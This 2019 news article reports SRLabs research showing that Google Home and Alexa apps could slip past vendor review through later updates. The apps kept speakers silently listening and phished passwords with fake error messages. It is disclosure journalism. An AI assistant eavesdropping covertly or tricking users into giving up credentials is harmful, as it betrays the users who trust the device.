Researchers: Google and Amazon Smart Speakers Are Vulnerable to Phishing, Eavesdropping Hacks
A group of security researchers found that applications for Google Home and Alexa could be used to obtain passwords and overhear conversations from unsuspecting users.
- By Haley Samsel
- Oct 22, 2019
Seemingly harmless applications for Google Home and Amazon Echo smart speakers can be used to eavesdrop on unsuspecting users, security researchers with SRLabs have discovered.
Both speaker systems allow third-party developers to submit software that creates additional commands for customers, referred to as Google Actions and Alexa Skills. Google and Amazon review the software before it is released to the public, but the SRLabs team was able to get around that process by submitting updates to previously approved apps.
Through its video series, SRLabs shows how hackers could take advantage of flaws in voice assistants to continue listening to a user for an extended period of time or even prompt them to hand over their password. The researchers gave Alexa and Google Home a series of characters it could not pronounce, which keeps the speaker silent but listening for further commands from the user.
“It was always clear that those voice assistants have privacy implications—with Google and Amazon receiving your speech, and this possibly being triggered on accident sometimes," Fabian Bräunlein, senior security consultant at SRLabs, told ArsTechnica. "We now show that, not only the manufacturers, but... also hackers can abuse those voice assistants to intrude on someone's privacy."
In addition, the researchers found vulnerabilities that made it simple to generate a fake error message that then prompts the user to enter their password. The phishing hack is hidden within software that allows a speaker to ask for “today’s lucky horoscope.”
There have been no reports that the security vulnerabilities have been used outside of the research. Prior to publishing its series on the issue, SRLabs turned over their research to Google and Amazon, both of which say they have taken steps to address the problems with the smart speakers.
Google told Ars Technica it is undertaking an internal review of third-party software and has temporarily disabled some apps during the review. Both companies took down the apps posted by SRLabs.
Tim Erlin, the vice president of product management and strategy at Tripwire, said that outside developers have the ability to script conversations deployed to hundreds or thousands of users with less oversight than official Google or Alexa apps.
“Apps like these, especially those that mimic the built-in virtual assistants, exploit the inherent trust consumers place in the major platform vendors,” Erlin said. “We’re surrounded nearly 24/7 by devices with the capability to eavesdrop. It should be no surprise that such a broad target surface is attractive to attackers.”
About the Author
Haley Samsel is an Associate Content Editor for the Infrastructure Solutions Group at 1105 Media.